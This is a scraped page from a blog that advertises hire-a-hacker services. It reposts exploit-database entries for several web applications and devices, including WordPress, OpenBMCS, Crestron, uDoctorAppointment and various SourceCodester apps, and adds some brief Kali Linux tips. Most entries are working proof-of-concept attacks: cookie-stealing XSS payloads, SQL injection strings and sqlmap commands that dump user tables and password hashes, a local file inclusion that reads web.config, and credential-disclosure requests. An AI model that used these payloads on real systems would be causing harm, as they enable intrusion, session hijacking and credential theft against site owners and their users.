Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863131868

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
#Exploit Title: Online Diagnostic Lab Management System 1.0 - Stored Cross Site Scripting (XSS)
#Date: 11/01/2022
#Exploit Author: Himash
#Vendor Homepage: https://www.sourcecodester.com/php/15129/online-diagnostic-lab-management-system-php-free-source-code.html
#Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/odlms.zip
#Version: 1.0
#Tested on: Kali Linux

Online Diagnostic Lab Management System 1.0 is vulnerable to stored cross-site-scripting.
Stored cross-site scripting (persistent XSS) arises when an application receives its data from
an untrusted source and includes that data within its responses in an unsafe way.

#Steps to Reproduce

1. Login to the admin account with username 'admin' and password 'admin123'

2. Navigate to the 'User List' option 

3. Create new user by adding following payload in
   First Name and Last Name fields.
   <image src/onerror=prompt(document.cookie)>

4. XSS payload will be triggered in the page http://localhost/odlms/admin/?page=user/list
HireHackking

There are a lot of tips in our use of kali penetration and work, you know? This article will show you these tips so that your changes can complete the required work. Of course these tips are suitable for other debian series distributions.

Modify kali Linux time

For modification time, we can select the relevant time zone when installing kali. As long as kali is connected to the network, the time will be automatically updated. If you accidentally set the wrong time zone, or take a plane to the United States to conduct penetration, then you need to modify your time.

View current time zone information

timedatectl display information nynrymi41jv4363.jpg

List available time zones

timedatectl list-timezones rmaxitgjgxo4365.jpg

Set the time zone

sudo timedatectl set-timezone Africa/Conakry update time

sudo timedatectl set-ntp on

Looking for public network IP address in Kali Linux

What is the difference between local IP and public IP?

If your system is connected to the Internet, you are likely to have used at least two IP addresses on your system. One IP address is the local address of the system, and the other IP address is the address you are connected to by the device on the Internet. This is an IP address that can be routed on the World Wide Web, allowing you to connect to other servers and routers around the world.

We can easily view local IP using ifconfig

How to obtain public IP?

echo $(wget -qO - https://api.ipify.org)

or

echo $(curl -s https://api.ipify.org) gltcmz1u5024368.jpg

How to install Java JDK in Kali Linux

Java has been installed by default in kali. If you need to manually install other corresponding Java versions, we need to manually install them. Use the apt package manager to update the system's repository and install the default JDK package.

apt update

apt install default-jdk If you want to install a specific version of JDK, use the following command to search for the exact package you need. This will display all JDK packages available for installation.

apt-cache search Toggle between openjdkJava versions, please execute the following two commands when selecting the desired Java version.

sudo update-alternatives --config java

sudo update-alternatives --config javac

Installing Nvidia GPU driver

First ensure that kali is the latest system

Identify the graphics card you installed and verify that it is using the Nvidia open source driver.

lspci | grep -i vga

00:02.0 VGA compatible controller: NVIDIA Corporation GP106 [GeForce GTX 1060 6GB] (rev a1) Next, use the apt package manager to install the driver and CUDA toolkit with the following commands.

sudo apt install nvidia-driver nvidia-cuda-toolkit After the process is completed, restart the computer for the changes to take effect.

reboot

How to view Kali Linux version

The lsb_release -a command displays the release version, description, and operating system code. This is the easiest way to quickly find the version of Kali you are running.zekhdogxyk04370.jpg

As above, my kali 2021.4hostnamectl command shows us the kernel version and CPU architecture

Static hostname: kali

Icon name: computer-vm

Chassis: vm

Machine ID: ed4b436e3798434d9e90679f82be54dd

Boot ID: 40e02be28a7f41eb9dfbdb9490bb4b68

Virtualization: vmware

Operating System: Kali GNU/Linux Rolling

Kernel: Linux 5.15.0-kali2-amd64

Architecture: x86-64

Hardware Vendor: VMware, Inc.

Hardware Model: VMware Virtual Platform

Default username and password

The default username and password of Kali Linux is kali. The root password is also kali.

HireHackking 
# Exploit Title: WorkTime 10.20 Build 4967 - Unquoted Service Path
# Discovery by: Yehia Elghaly
# Date: 30-12-2021
# Vendor Homepage:  https://www.worktime.com/
# Software Link: https://www.worktime.com/download/worktime_corporate.exe
# Tested Version: 10.20 Build Build 4967
# Vulnerability Type: Unquoted Service Path
# Tested on: Windows 7 x86 - Windows Server 2016 x64

# Step to discover Unquoted Service Path:

C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
|findstr /i /v "c:\windows\\" |findstr /i /v """

WorkTime Server  srvWorkTimeServer  
C:\WorkTime\WorkTimeServerService.exe
Auto

WorkTime Reports Scheduler  WorkTimeReportsScheduler  
C:\Program Files\WorkTimeAdministrator\WorkTimeReportsScheduler.exe                            
Auto

WorkTime Client Watcher Service   WTCWatch 
C:\Program Files\wtc\WTCWatch.exe WTCWatch
Auto


C:\Users\psycho>sc qc  WorkTimeReportsScheduler
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: WorkTimeReportsScheduler
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\Program Files\WorkTimeAdministrator\WorkTimeRepo
rtsScheduler.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : WorkTime Reports Scheduler
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Users\psycho>sc qc WTCWatch
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: WTCWatch
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\Program Files\wtc\WTCWatch.exe WTCWatch
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : WorkTime Client Watcher Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
HireHackking 
# Exploit Title: WordPress Core 5.8.2 - 'WP_Query' SQL Injection
# Date: 11/01/2022
# Exploit Author: Aryan Chehreghani
# Vendor Homepage: https://wordpress.org
# Software Link: https://wordpress.org/download/releases
# Version: < 5.8.3
# Tested on: Windows 10
# CVE : CVE-2022-21661

# [ VULNERABILITY DETAILS ] : 

#This vulnerability allows remote attackers to disclose sensitive information on affected installations of WordPress Core,
#Authentication is not required to exploit this vulnerability, The specific flaw exists within the WP_Query class,
#The issue results from the lack of proper validation of a user-supplied string before using it to construct SQL queries,
#An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise.

# [ References ] : 

https://wordpress.org/news/category/releases
https://www.zerodayinitiative.com/advisories/ZDI-22-020
https://hackerone.com/reports/1378209

# [ Sample Request ] :

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Upgrade-Insecure_Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.99
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Sec-Fetch-User: ?1
Cache-Control: max-age=0
Connection: close 
Content-Type: application/x-www-form-urlencoded

action=<action_name>&nonce=a85a0c3bfa&query_vars={"tax_query":{"0":{"field":"term_taxonomy_id","terms":["<inject>"]}}}
HireHackking

Archeevo 5.0 - Local File Inclusion

HACKER · %s · %s

# Exploit Title: Archeevo 5.0 - Local File Inclusion # Google Dork: intitle:"archeevo" # Date: 01/15/2021 # Exploit Author: Miguel Santareno # Vendor Homepage: https://www.keep.pt/ # Software Link: https://www.keep.pt/produtos/archeevo-software-de-gestao-de-arquivos/ # Version: < 5.0 # Tested on: windows # 1. Description Unauthenticated user can exploit LFI vulnerability in file parameter. # 2. Proof of Concept (PoC) Access a page that don’t exist like /test.aspx and then you will be redirected to https://vulnerable_webiste.com/error?StatusCode=404&file=~/FileNotFoundPage.html After that change the file /FileNotFoundPage.html to /web.config and you be able to see the /web.config file of the application. https://vulnerable_webiste.com/error?StatusCode=404&file=~/web.config # 3. Research: https://miguelsantareno.github.io/MoD_1.pdf
HireHackking

Online Resort Management System 1.0 - SQLi (Authenticated)

HACKER · %s · %s

# Exploit Title: Online Resort Management System 1.0 - SQLi (Authenticated) # Date: 15/01/2022 # Exploit Author: Gaurav Grover # Vendor Homepage: <http://192.168.0.108/orms/admin/login.php> # Software Link: <https://www.sourcecodester.com/php/15126/online-resort-management-system-using-phpoop-free-source-code.html> # Version: 1.0 # Tested on: Linux and windows both Summary: There are a vulnerabilities in Online Resort Management System (ORMS) 1. The attacker can easily retrieved the database using sql injection. Proof of concepts : Database dump Manualy using SQL Injection, SQL Query & Users detaile are mentioned below: 1. After login with the admin credentials(Username : admin / Password : admin123) there is a vulnerable parameter name is id= 2. Found SQL Injection Parameter :- http://192.168.0.108/orms/admin/?page=rooms/view_room&id=2%27order%20by%2010--+ 3. http://192.168.0.108/orms/admin/?page=rooms/view_room&id=-2%27union%20select%201,2,3,4,5,6,7,8,9,10--+ 4. (Database Name :- orms_db) Query:- http://192.168.0.108/orms/admin/?page=rooms/view_room&id=-2%27union%20select%201,database(),3,4,5,6,7,8,9,10--+ 5. (Table Name :- activity_list,message_list,reservation_list,room_list,system_info,users Query:- http://192.168.0.108/orms/admin/?page=rooms/view_room&id=-2%27union%20select%201,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()),3,4,5,6,7,8,9,10--+ 6. (Username Password :- User-1 admin / 0192023a7bbd73250516f069df18b500 , User-2 cblake / 1cd74fae0a3adf459f73bbf187607ccea Query:- http://192.168.0.108/orms/admin/?page=rooms/view_room&id=-2%27union%20select%201,(select%20group_concat(username,password)%20from%20users),3,4,5,6,7,8,9,10--+ ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Database dump Automated using Sqlmap Tool, SQL Query & Users detaile are mentioned below: 1. Database Name:- sqlmap.py -u "http://192.168.0.108/orms/admin/?page=rooms/view_room&id=2" --batch -dbs available databases [8]: [*] clinic_db [*] information_schema [*] mtms_db [*] mysql [*] orms_db [*] performance_schema [*] phpmyadmin [*] test 2- Dump the tables using this SQL Query:- sqlmap.py -u "http://192.168.0.108/orms/admin/?page=rooms/view_room&id=2" --batch -D orms_db --tables Database: mtms [6 tables] +------------------+ | activity_list | | message_list | | reservation_list | | room_list | | system_info | | users | +------------------+ 3- Dump the database using this SQL Query:- sqlmap.py -u "http://192.168.0.108/orms/admin/?page=rooms/view_room&id=2" --batch -D orms_db -T users --dump Database: orms_db Table: users [2 entries] +----+------+--------+-----------------------------------+----------+----------+---------------------------------------------+--------------+------------+------------+---------------------+---------------------+ | id | type | status | avatar | username | lastname | password | firstname | middlename | last_login | date_added | date_updated | +----+------+--------+-----------------------------------+----------+----------+---------------------------------------------+--------------+------------+------------+---------------------+---------------------+ | 1 | 1 | 1 | uploads/avatar-1.png?v=1639468007 | admin | Admin | 0192023a7bbd73250516f069df18b500 (admin123) | Adminstrator | NULL | NULL | 2021-01-20 14:02:37 | 2021-12-14 15:47:08 | | 5 | 2 | 1 | uploads/avatar-5.png?v=1641622906 | cblake1 | Blake | cd74fae0a3adf459f73bbf187607ccea (cblake) | Claire | NULL | NULL | 2022-01-08 14:21:46 | 2022-01-15 14:01:28 | +----+------+--------+-----------------------------------+----------+----------+---------------------------------------------+--------------+------------+------------+---------------------+---------------------+
HireHackking

OpenBMCS 2.4 - SQLi (Authenticated)

HACKER · %s · %s

# Exploit Title: OpenBMCS 2.4 - SQLi (Authenticated) # Exploit Author: LiquidWorm # Date: 26/10/2021 OpenBMCS 2.4 Authenticated SQL Injection Vendor: OPEN BMCS Product web page: https://www.openbmcs.com Affected version: 2.4 Summary: Building Management & Controls System (BMCS). No matter what the size of your business, the OpenBMCS software has the ability to expand to hundreds of controllers. Our product can control and monitor anything from a garage door to a complete campus wide network, with everything you need on board. Desc: OpenBMCS suffers from an SQL Injection vulnerability. Input passed via the 'id' GET parameter is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. Tested on: Linux Ubuntu 5.4.0-65-generic (x86_64) Linux Debian 4.9.0-13-686-pae/4.9.228-1 (i686) Apache/2.4.41 (Ubuntu) Apache/2.4.25 (Debian) nginx/1.16.1 PHP/7.4.3 PHP/7.0.33-0+deb9u9 Vulnerability discovered by Semen 'samincube' Rozhkov @zeroscience Advisory ID: ZSL-2022-5692 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5692.php 26.10.2021 -- The following PoC request demonstrates the issue (authenticated user session is required): GET /debug/obix_test.php?id=1%22 HTTP/1.1 Host: 192.168.1.222 Cookie: PHPSESSID=ssid123ssid123ssid1234ssid Connection: close Response: HTTP/1.1 200 OK Date: Sat, 1 Jan 2022 15:09:54 GMT Server: Apache/2.4.10 (Debian) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 629 Connection: close Content-Type: text/html; charset=UTF-8 <br /> <b>Fatal error</b>: Uncaught exception 'PDOException' with message 'SQLSTATE[HY000]: General error: 1 unrecognized token: """' in /var/www/openBMCS/classes/dbconnection.php:146 Stack trace: #0 /var/www/openBMCS/classes/dbconnection.php(146): PDO->query('SELECT ip_addre...') #1 /var/www/openBMCS/php/obix/obix.functions.php(289): controllerDB->querySingle('SELECT ip_addre...', true) #2 /var/www/openBMCS/debug/obix_test.php(16): sendObixGetTocontroller(Object(controllerDB), '1"', '/obix/config') #3 {main} thrown in <b>/var/www/openBMCS/classes/dbconnection.php</b> on line <b>146</b><br />
HireHackking

Simple Chatbot Application 1.0 - 'message' Blind SQLi

HACKER · %s · %s

# Exploit Title: Simple Chatbot Application 1.0 - 'message' Blind SQLi # Date: 18/01/2022 # Exploit Author: Saud Alenazi # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/14788/simple-chatbot-application-using-php-source-code.html # Version: 1.0 # Tested on: XAMPP, Windows 10 # Steps # Go to : http://127.0.0.1/classes/Master.php?f=get_response # Save request in BurpSuite # Run saved request with sqlmap -r sql.txt ====== POST /classes/Master.php?f=get_response HTTP/1.1 Host: 127.0.0.1 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Cookie: PHPSESSID=45l30lmah262k7mmg2u5tktbc2 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate Content-Length: 73 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36 Connection: Keep-alive message=' AND (SELECT 8288 FROM (SELECT(SLEEP(10)))ypPC) AND 'Saud'='Saud ====== #Payloads #Payload (UNION query) message=-8150' UNION ALL SELECT CONCAT(0x717a766b71,0x6d466451694363565172525259434d436c53677974774a424b635856784f4d5a41594e4e75424474,0x716a7a7171),NULL-- - #(AND/OR time-based blind) message=' AND (SELECT 8288 FROM (SELECT(SLEEP(10)))ypPC) AND 'Saud'='Saud
HireHackking

OpenBMCS 2.4 - Information Disclosure

HACKER · %s · %s

# Exploit Title: OpenBMCS 2.4 - Information Disclosure # Exploit Author: LiquidWorm # Date: 26/10/2021 OpenBMCS 2.4 Secrets Disclosure Vendor: OPEN BMCS Product web page: https://www.openbmcs.com Affected version: 2.4 Summary: Building Management & Controls System (BMCS). No matter what the size of your business, the OpenBMCS software has the ability to expand to hundreds of controllers. Our product can control and monitor anything from a garage door to a complete campus wide network, with everything you need on board. Desc: The application allows directory listing and information disclosure of some sensitive files that can allow an attacker to leverage the disclosed information and gain full BMS access. Tested on: Linux Ubuntu 5.4.0-65-generic (x86_64) Linux Debian 4.9.0-13-686-pae/4.9.228-1 (i686) Apache/2.4.41 (Ubuntu) Apache/2.4.25 (Debian) nginx/1.16.1 PHP/7.4.3 PHP/7.0.33-0+deb9u9 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2022-5695 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5695.php 26.10.2021 -- https://192.168.1.222/debug/ Index of /debug change_password_sqls clear_all_watches.php controllerlog/ dash/ dodgy.php fix_out.php graphics/ graphics_diag.php graphics_ip_diag/ jace_info.php kits/ mysession.php nuke.php obix_test.php print_tree.php reboot_backdoor.php rerunSQLUpdates.php reset_alarm_trigger_times.php system/ test_chris_obix.php timestamp.php tryEmail.php trysms.php unit_testing/ userlog/ ... ... /cache/ /classes/ /config/ /controllers/ /core/ /css/ /display/ /fonts/ /images/ /js/ /php/ /plugins/ /sounds/ /temp/ /tools/ /core/assets/ /core/backup/ /core/crontab/ /core/font/ /core/fonts/ /core/license/ /core/load/ /core/logout/ /core/password/ /php/audit/ /php/phpinfo.php /php/temp/ /php/templates/ /php/test/ /php/weather/ /plugins/alarms/ /tools/phpmyadmin/index.php /tools/migrate.php
HireHackking

Creston Web Interface 1.0.0.2159 - Credential Disclosure

HACKER · %s · %s

# Exploit Title: Creston Web Interface 1.0.0.2159 - Credential Disclosure # Exploit Author: RedTeam Pentesting GmbH Advisory: Credential Disclosure in Web Interface of Crestron Device When the administrative web interface of the Crestron HDMI switcher is accessed unauthenticated, user credentials are disclosed which are valid to authenticate to the web interface. Details ======= Product: Crestron HD-MD4X2-4K-E Affected Versions: 1.0.0.2159 Fixed Versions: - Vulnerability Type: Information Disclosure Security Risk: high Vendor URL: https://de.crestron.com/Products/Video/HDMI-Solutions/HDMI-Switchers/HD-MD4X2-4K-E Vendor Status: decided not to fix Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-009 Advisory Status: published CVE: CVE-2022-23178 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23178 Introduction ============ "Crestron sets the gold standard for network security by leveraging the most advanced technologies including 802.1x authentication, AES encryption, Active Directory® credential management, JITC Certification, SSH, secure CIP, PKI certificates, TLS, and HTTPS, among others, to provide network security at the product level." (from the vendor's homepage) More Details ============ Upon visiting the device's web interface using a web browser, a login form is displayed requiring to enter username and password to authenticate. The analysis of sent HTTP traffic revealed that in addition to the loading of the website, a few more HTTP requests are automatically triggered. One of the associated responses contains a username and a password which can be used to authenticate as the affected user. Proof of Concept ================ Requesting the URL "http://crestron.example.com/" via a web browser results in multiple HTTP requests being sent. Among others, the following URL is requested: ------------------------------------------------------------------------ http://crestron.example.com/aj.html?a=devi&_=[...] ------------------------------------------------------------------------ This request results in a response similar to the following: ------------------------------------------------------------------------ HTTP/1.0 200 OK Cache-Control: no-cache Content-type: text/html { "login_ur": 0, "front_val": [ 0, 1 ], "uname": "admin", "upassword": "password" } ------------------------------------------------------------------------ The values for the keys "uname" and "upassword" could be used to successfully authenticate to the web interface as the affected user. Workaround ========== Reachability over the network can be restricted for access to the web interface, for example by using a firewall. Fix === No fix known. Security Risk ============= As user credentials are disclosed to visitors of the web interface they can directly be used to authenticate to it. The access allows to modify the device's input and output settings as well as to upload and install new firmware. Due to ease of exploitation and gain of administrative access this vulnerability poses a high risk. Timeline ======== 2021-10-06 Vulnerability identified 2021-11-15 Customer approved disclosure to vendor 2021-12-08 Vendor notified 2021-12-15 Vendor notified again 2021-12-21 Vendor response received: "The device in question doesn't support Crestron's security practices. We recommend the HD-MD-4KZ alternative." 2021-12-22 Requested confirmation, that the vulnerability will not be addressed. 2021-12-28 Vendor confirms that the vulnerability will not be corrected. 2022-01-12 Advisory released RedTeam Pentesting GmbH ======================= RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting ============================= RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://www.redteam-pentesting.de/jobs/ -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachen https://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen
HireHackking

uDoctorAppointment v2.1.1 - 'Multiple' Cross Site Scripting (XSS)

HACKER · %s · %s

# Exploit Title: uDoctorAppointment v2.1.1 - 'Multiple' Cross Site Scripting (XSS) # Exploit Author: Vulnerability-Lab # Date: 15/12/2021 Document Title: =============== uDoctorAppointment v2.1.1 - Multiple XSS Vulnerabilities References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2288 Release Date: ============= 2021-12-15 Vulnerability Laboratory ID (VL-ID): ==================================== 2288 Common Vulnerability Scoring System: ==================================== 5 Vulnerability Class: ==================== Cross Site Scripting - Non Persistent Current Estimated Price: ======================== 500€ - 1.000€ Product & Service Introduction: =============================== Clinic management, doctor or therapist online medical appointment scheduling system for the management of health care. uDoctorAppointment script allows doctors to register and appropriate membership plan with different features. Patients can view doctor profiles before booking appointments. The site administrator or doctor may create and manage advanced schedules, create working time slots for each day of the week, define time off etc. (Copy of the Homepage:https://www.apphp.com/codemarket/items/1/udoctorappointment-php-script ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered multiple non-persistent cross site web vulnerabilities in the uDoctorAppointment script web-application. Affected Product(s): ==================== ApPHP Product: uDoctorAppointment v2.1.1 - Health Care Script (PHP) (Web-Application) Product: ApPHP MVC Framework v1.1.5 (Framework) Vulnerability Disclosure Timeline: ================================== 2021-09-01: Researcher Notification & Coordination (Security Researcher) 2021-09-02: Vendor Notification (Security Department) 2021-09-10: Vendor Response/Feedback (Security Department) 2021-**-**: Vendor Fix/Patch (Service Developer Team) 2021-**-**: Security Acknowledgements (Security Department) 2021-12-15: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== Pre Auth (No Privileges or Session) User Interaction: ================= Low User Interaction Disclosure Type: ================ Responsible Disclosure Technical Details & Description: ================================ Multiple non-persistent cross site vulnerabilities has been discovered in the official uDoctorAppointment v2.1.1 script web-application. The vulnerability allows remote attackers to inject own malicious script codes with non-persistent attack vector to compromise browser to web-application requests from the client-side. The cross site security web vulnerabilities are located in the `created_at`, `created_date` and `sent_at` parameters of the `filter` web module. The injection point is located in the parameters and the execution occurs in the filter module. The request method to inject the malicious script code is GET and the attack vector of the vulnerability is non-persistent on client-side. Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to malicious source and non-persistent manipulation of affected application modules. Request Method(s): [+] GET Vulnerable Module(s): [+] ./doctorReviews/doctorReviews [+] ./orders/orders [+] /mailingLog/manage [+] /orders/doctorsManage [+] /news/manage [+] /newsSubscribers/manage [+] /doctorReviews/manage/status/approved [+] /appointments/manage Vulnerable Parameter(s): [+] created_at [+] created_date [+] sent_at [+] appointment_date Affected Module(s): [+] Filter Proof of Concept (PoC): ======================= The client-side cross site scripting web vulnerabilities can be exploited by remote attackers without account and with low user interaction. For security demonstration or to reproduce the cross site web vulnerability follow the provided information and steps below to continue. Exploitation: Payload ">%20<img%20src="evil.source"%20onload=alert(document.domain)></img> Role: Patient (Frontend - created_at) https://doctor-appointment.localhost:8080/doctorReviews/doctorReviews?patient_name=test&created_at=2021-09-08&but_filter=Filter - https://doctor-appointment.localhost:8080/doctorReviews/doctorReviews?patient_name=test&created_at=%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E&but_filter=Filter Role: Doctor (Frontend - created_date) https://doctor-appointment.localhost:8080/orders/orders?order_number=test&created_date=2021-09-08&status=2&but_filter=Filter - https://doctor-appointment.localhost:8080/orders/orders?order_number=test&created_date=%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E&status=2&but_filter=Filter Role: Admin (Backend - https://doctor-appointment.localhost:8080/mailingLog/manage?email_subject=test1&email_content=test2&email_from=test3&email_to=test4&sent_at=2021-09-01&status=0&but_filter=Filter https://doctor-appointment.localhost:8080/orders/doctorsManage?order_number=test1&created_date=2021-09-01&doctor_id=1&status=1&but_filter=Filter https://doctor-appointment.localhost:8080/news/manage?news_header=test1&created_at=2021-09-01&but_filter=Filter https://doctor-appointment.localhost:8080/newsSubscribers/manage?first_name=test1&last_name=test2&email=test%40aol.com&created_at=2021-09-01&but_filter=Filter https://doctor-appointment.localhost:8080/doctorReviews/manage/status/approved?doctor_first_name%2Cdoctor_last_name=test1&patient_name=test2&created_at=2021-09-01&but_filter=Filter https://doctor-appointment.localhost:8080/appointments/manage?appointment_number=test1&patient_first_name%2Cpatient_last_name=test2&doctor_first_name%2Cdoctor_last_name=test3&appointment_date=2021-09-01&but_filter=Filter https://doctor-appointment.localhost:8080/orders/doctorsManage?order_number=test1&created_date=2021-09-01&doctor_id=1&status=1&but_filter=Filter - https://doctor-appointment.localhost:8080/mailingLog/manage?email_subject=test1&email_content=test2&email_from=test3&email_to=test4&sent_at=%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E&status=0&but_filter=Filter https://doctor-appointment.localhost:8080/orders/doctorsManage?order_number=test1&created_date=%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E&doctor_id=1&status=1&but_filter=Filter https://doctor-appointment.localhost:8080/news/manage?news_header=test1&created_at=%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E&but_filter=Filter https://doctor-appointment.localhost:8080/newsSubscribers/manage?first_name=test1&last_name=test2&email=test%40aol.com&created_at=%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E&but_filter=Filter https://doctor-appointment.localhost:8080/doctorReviews/manage/status/approved?doctor_first_name%2Cdoctor_last_name=test1&patient_name=test2&created_at=%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E&but_filter=Filter https://doctor-appointment.localhost:8080/appointments/manage?appointment_number=test1&patient_first_name%2Cpatient_last_name=test2&doctor_first_name%2Cdoctor_last_name=test3&appointment_date=%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E&but_filter=Filter https://doctor-appointment.localhost:8080/orders/doctorsManage?order_number=test1&created_date=%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E&doctor_id=1&status=1&but_filter=Filter Vulnerable Source: ./mailingLog <div class="filtering-wrapper"> <form id="frmFilterMailingLog" action="mailingLog/manage" method="get"> Subject: <input id="email_subject" style="width:140px;" maxlength="125" type="text" value="a" name="email_subject"> Content: <input id="email_content" style="width:140px;" maxlength="125" type="text" value="b" name="email_content"> From: <input id="email_from" style="width:130px;" maxlength="125" type="text" value="c" name="email_from"> To: <input id="email_to" style="width:130px;" maxlength="125" type="text" value="d" name="email_to"> Date Sent: <input id="sent_at" maxlength="255" style="width:80px;" type="text" value=">" <img="" src="evil.source" onload="alert(document.cookie)" [MALICIOUS EXECUTABLE SCRIPT CODE PAYLOAD!] class="hasDatepicker"> <img class="ui-datepicker-trigger" src="assets/vendors/jquery/images/calendar.png" alt="..." title="..."> " name="sent_at" />Status: <select id="status" style="width: 90px; padding: 10px; display: none;" name="status" class="chosen-select-filter"> <option value="" selected="selected">--</option> <option value="0">Not Sent</option> <option value="1">Sent</option> </select><div class="chosen-container chosen-container-single chosen-container-single-nosearch" style="width: 90px;" title="" id="status_chosen"> <a class="chosen-single" tabindex="-1"><span>--</span><div><b></b></div></a><div class="chosen-drop"><div class="chosen-search"> <input type="text" autocomplete="off" readonly="" maxlength="255"></div><ul class="chosen-results"></ul></div></div>&nbsp; <div class="buttons-wrapper"> <input name="" class="button white" onclick="jQuery(location).attr('href','https://doctor-appointment.localhost:8080/mailingLog/manage');" type="button" value="Cancel"> <input name="but_filter" type="submit" value="Filter"> </div></form></div> --- PoC Session Logs (GET) --- https://doctor-appointment.localhost:8080/mailingLog/manage?email_subject=a&email_content=b&email_from=c&email_to=d&sent_at=>"<img+src%3D"evil.source"+onload%3Dalert(document.cookie)>++&status=&but_filter=Filter Host: doctor-appointment.localhost:8080 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Connection: keep-alive Cookie: isOpened=menu-04; apphp_9tmmw0krko=g2234alc8h8ks3ms2nsbp4tsa9 - GET: HTTP/1.1 200 OK Server: Apache Content-Length: 2914 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Reference(s): https://doctor-appointment.localhost:8080/ https://doctor-appointment.localhost:8080/mailingLog/ https://doctor-appointment.localhost:8080/news/manage https://doctor-appointment.localhost:8080/order/manage https://doctor-appointment.localhost:8080/mailingLog/manage https://doctor-appointment.localhost:8080/appointments/manage https://doctor-appointment.localhost:8080/orders/doctorsManage https://doctor-appointment.localhost:8080/newsSubscribers/manage Solution - Fix & Patch: ======================= The vulnerability can be resolved by a filter or secure encode of the vulnerable created_date, appointment_date, sent_at and create_at parameters. Disallow the usage of special chars in the affected parameters on get method requests. Sansitize the vulnerable output location to resolve the point of execution in the filter module. Credits & Authors: ================== Vulnerability-Lab [RESEARCH TEAM] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains:www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php 